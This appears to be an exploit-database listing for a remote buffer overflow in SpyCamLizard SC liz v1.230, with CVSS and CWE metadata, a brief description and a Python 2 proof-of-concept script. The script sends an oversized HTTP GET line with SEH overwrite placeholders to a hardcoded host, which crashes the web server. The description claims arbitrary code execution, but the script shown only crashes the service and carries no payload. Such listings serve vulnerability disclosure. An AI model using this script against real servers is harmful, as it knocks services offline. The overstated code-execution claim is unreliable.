SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay

vendor:

SpyCamLizard SC liz

by:

Greg Priest

7,8

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: SpyCamLizard SC liz

Affected Version From: v1.230

Affected Version To: v1.230

Patch Exists: YES

Related CWE: N/A

CPE: a:spycamlizard:spycamlizard_sc_liz

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows7 x64 HUN/ENG Enterprise

2017

SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay

SpyCamLizard SC liz v1.230 is vulnerable to a remote buffer overflow attack. By sending a specially crafted HTTP request containing an overly long string, an attacker can overflow a buffer and execute arbitrary code on the target system. This exploit was tested on Windows7 x64 HUN/ENG Enterprise.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

import socket
import sys

author = '''
  
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
                ##############################################
  
# Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay
# Date: 2017.03.22
# Exploit Author: Greg Priest
# Version: SpyCamLizard v1.230
# Tested on: Windows7 x64 HUN/ENG Enterprise
'''

print "SpyCamLizard DoS Exploit running!"
 
host = "192.168.56.1"
port = 80
overflow = "A" * 1189
nextSEH = "BBBB" 
SEH = "CCCC" 
overflow2= "D" * 3803

crash = overflow+nextSEH+SEH+overflow2

httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
httpsocket.connect((host,port))
httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n")
httpsocket.close()


print "SpyCamLizard shutted down!"